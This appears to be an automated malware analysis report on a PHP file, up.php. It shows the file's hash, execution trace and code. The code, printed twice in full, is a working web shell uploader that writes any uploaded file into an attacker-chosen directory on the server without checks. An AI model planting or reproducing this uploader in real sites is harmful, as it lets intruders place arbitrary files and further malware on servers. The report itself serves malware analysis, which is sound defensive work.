PHP Malware Analysis
up.php
md5: 49a17970e2bd550cae8ef060013f71b7
Jump to:
- Deobfuscated code (Read more)
- Execution traces (Read more)
- Generated HTML (Read more)
- Original Code (Read more)
Screenshot
Attributes
Environment
- getcwd (Deobfuscated, HTML, Original)
Files
- copy (Deobfuscated, Original)
Input
- _FILES (Deobfuscated, Original)
- _POST (Deobfuscated, Original)
Deobfuscated PHP code
<?php
$uploadd = $_FILES['file']['tmp_name'];
if (file_exists($uploadd)) {
$pwddir = $_POST['dir'];
$real = $_FILES['file']['name'];
$de = $pwddir . "/" . $real;
copy($uploadd, $de);
echo "FILE UPLOADED TO {$de}";
}
?>
<form method="post" enctype="multipart/form-data">
<input type="text" name="dir" size="30" value="<?php
echo getcwd();
?>">
<input type="file" name="file" size="15">
<input type="submit" value="Upload">
</form>Execution traces
data/traces/49a17970e2bd550cae8ef060013f71b7_trace-1676250301.3762.xtVersion: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 23:05:27.274005]
1 0 1 0.000168 393464
1 3 0 0.000227 395712 {main} 1 /var/www/html/uploads/up.php 0 0
1 A /var/www/html/uploads/up.php 2 $uploadd = NULL
2 4 0 0.000274 395712 file_exists 0 /var/www/html/uploads/up.php 3 1 NULL
2 4 1 0.000288 395752
2 4 R FALSE
1 3 1 0.000303 395712
0.000328 314232
TRACE END [2023-02-12 23:05:27.274197]
Generated HTML code
<html><head></head><body><form method="post" enctype="multipart/form-data">
<input type="text" name="dir" size="30" value="<? echo getcwd(); ?>">
<input type="file" name="file" size="15">
<input type="submit" value="Upload">
</form></body></html>Original PHP code
<?php
$uploadd = $_FILES['file']['tmp_name'];
if (file_exists($uploadd)) {
$pwddir = $_POST['dir'];
$real = $_FILES['file']['name'];
$de = $pwddir."/".$real;
copy($uploadd, $de);
echo "FILE UPLOADED TO $de";
}
?>
<form method="post" enctype="multipart/form-data">
<input type="text" name="dir" size="30" value="<? echo getcwd(); ?>">
<input type="file" name="file" size="15">
<input type="submit" value="Upload">
</form>